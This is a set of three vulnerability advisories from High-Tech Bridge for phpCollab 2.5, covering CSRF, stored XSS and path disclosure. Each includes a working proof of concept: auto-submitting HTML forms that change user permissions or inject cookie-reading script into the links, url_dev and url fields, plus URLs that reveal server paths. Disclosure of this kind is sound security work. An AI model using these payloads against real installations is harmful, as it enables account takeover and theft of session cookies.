Vulnerability ID: HTB22916
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_phpcollab.html
Product: phpCollab
Vendor: phpCollab Team ( http://www.php-collab.org/)
Vulnerable Version:2.5and probably prior versions
Vendor Notification:24 March 2011
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "users/edituser.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:<form action="http://host/users/edituser.php?id=USERID&action=update" method="post" name="main"><inputtype="hidden" name="un" value="test"><inputtype="hidden" name="unOld" value="test"><inputtype="hidden" name="fn" value="test"><inputtype="hidden" name="tit" value="test"><inputtype="hidden" name="em" value="email (at) example (dot) com [email concealed]"><inputtype="hidden" name="pw" value=""><inputtype="hidden" name="pwa" value=""><inputtype="hidden" name="perm" value="5"><inputtype="hidden" name="Save" value="Save"></form><script>
document.main.submit();</script>
Vulnerability ID: HTB22917
Reference: http://www.htbridge.ch/advisory/xss_vulnerabilities_in_phpcollab.html
Product: phpCollab
Vendor: phpCollab Team ( http://www.php-collab.org/)
Vulnerable Version:2.5and probably prior versions
Vendor Notification:24 March 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "newsdesk/editnews.php","projects/editproject.php","clients/editclient.php" scripts to properly sanitize user-supplied inputin"links","url_dev","url" variables. Successful exploitation of this vulnerabilities could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:1.<form action="http://host/newsdesk/editnews.php?id=NEWSID&action=update" method="post"><inputtype="hidden" name="author" value="1"><inputtype="hidden" name="title" value="news2"><inputtype="hidden" name="related" value="g"><inputtype="hidden" name="content" value="hello2"><inputtype="hidden" name="links" value='2"><script>alert(document.cookie)</script>'><inputtype="hidden" name="rss" value="1"><inputtype="submit"id="btn" name="submit" value="Save"></form><script>
document.getElementById('btn').click();</script>2.<form action="http://host/projects/editproject.php?id=1&action=update&docopy=f
alse" method="post" name="main"><inputtype="hidden" name="projectPublished" value="1"><inputtype="hidden" name="pn" value="project name"><inputtype="hidden" name="pr" value="3"><inputtype="hidden" name="d" value="description"><inputtype="hidden" name="url_dev" value='site"><script>alert(document.cookie)</script>'><inputtype="hidden" name="url_prod" value=""><inputtype="hidden" name="pown" value="1"><inputtype="hidden" name="clod" value="1"><inputtype="hidden" name="thisPhase" value="0"><inputtype="hidden" name="st" value="2"><inputtype="hidden" name="up" value="51200"><inputtype="hidden" name="hourly_rate" value="200.00"></form><script>
document.main.submit();</script>3.<form action="http://host/clients/editclient.php?id=CLIENTID&action=update" method="post" name="main" enctype="multipart/form-data"><inputtype="hidden" name="MAX_FILE_SIZE" value="100000000"><inputtype="hidden" name="cn" value="client"><inputtype="hidden" name="add" value=""><inputtype="hidden" name="client_phone" value=""><inputtype="hidden" name="url" value='1"><script>alert(document.cookie)</script>'><inputtype="hidden" name="email" value=""><inputtype="hidden" name="comments" value=""><inputtype="hidden" name="hourly_rate" value="0.00"><inputtype="hidden" name="upload" value=""></form><script>
document.main.submit();</script>
Vulnerability ID: HTB22918
Reference: http://www.htbridge.ch/advisory/path_disclosure_in_phpcollab.html
Product: phpCollab
Vendor: phpCollab Team ( http://www.php-collab.org/)
Vulnerable Version:2.5and probably prior versions
Vendor Notification:24 March 2011
Vulnerability Type: Path disclosure
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "projects_site/login.php","general/error.php","includes/vcard.class.php" scripts, it's possible to generate an error that will reveal the full path of the script.
A remote user can determine the full path to the web root directory and other potentially sensitive information.
The following PoC is available:
http://host/projects_site/login.php
http://host/general/error.php
http://host/includes/vcard.class.php
